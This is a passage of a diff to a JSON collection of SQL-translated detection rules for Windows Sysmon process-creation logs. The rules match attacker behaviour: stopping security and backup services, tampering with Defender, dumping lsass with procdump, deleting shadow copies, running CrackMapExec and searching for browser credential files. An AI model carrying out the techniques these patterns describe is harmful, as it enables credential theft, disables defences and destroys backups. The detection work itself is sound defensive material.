'\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Potential Execution of Sysinternals Tools", + "id": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Legitimate use of SysInternals tools", + "Programs that use the same command line flag" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -accepteula%' ESCAPE '\\' OR CommandLine LIKE '% /accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_sysinternals_eula_accepted.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command", - "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "status": "test", - "description": "Detects presence of a potentially xor encoded powershell command", - "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_xor_commandline.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Suspicious Where Execution", - "id": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", - "status": "experimental", - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.discovery", - "attack.t1217" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\where.exe' ESCAPE '\\' OR OriginalFileName = 'where.exe') AND (CommandLine LIKE '%places.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%formhistory.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%logins.json%' ESCAPE '\\' OR CommandLine LIKE '%key4.db%' ESCAPE '\\' OR CommandLine LIKE '%key3.db%' ESCAPE '\\' OR CommandLine LIKE '%sessionstore.jsonlz4%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Login Data%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_where_browser_data_recon.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "title": "Suspicious Regsvr32 Execution With Image Extension", + "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1218.010" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "New Kernel Driver Via SC.EXE", - "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "status": "experimental", - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Rare legitimate installation of kernel drivers via sc.exe" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_new_kernel_driver.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", - "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", + "status": "test", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ], "falsepositives": [ - "Unlikely" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "Process Reconnaissance Via Wmic.EXE", - "id": "221b251a-357a-49a9-920a-271802777cc0", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", - "author": "frack113", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_process.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Shadow Copies Creation Using Operating Systems Utilities", - "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "status": "test", - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Add Scheduled Task Parent", + "id": "9494479d-d994-40bf-a8b1-eea890237021", + "status": "experimental", + "description": "Detects suspicious scheduled task creations from a parent stored in a temporary folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%unattended.ini%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_shadow_copies_creation.yml" + "filename": "proc_creation_win_schtasks_parent.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", - "status": "experimental", - "description": "Detects an executable in the users directory started from one of the 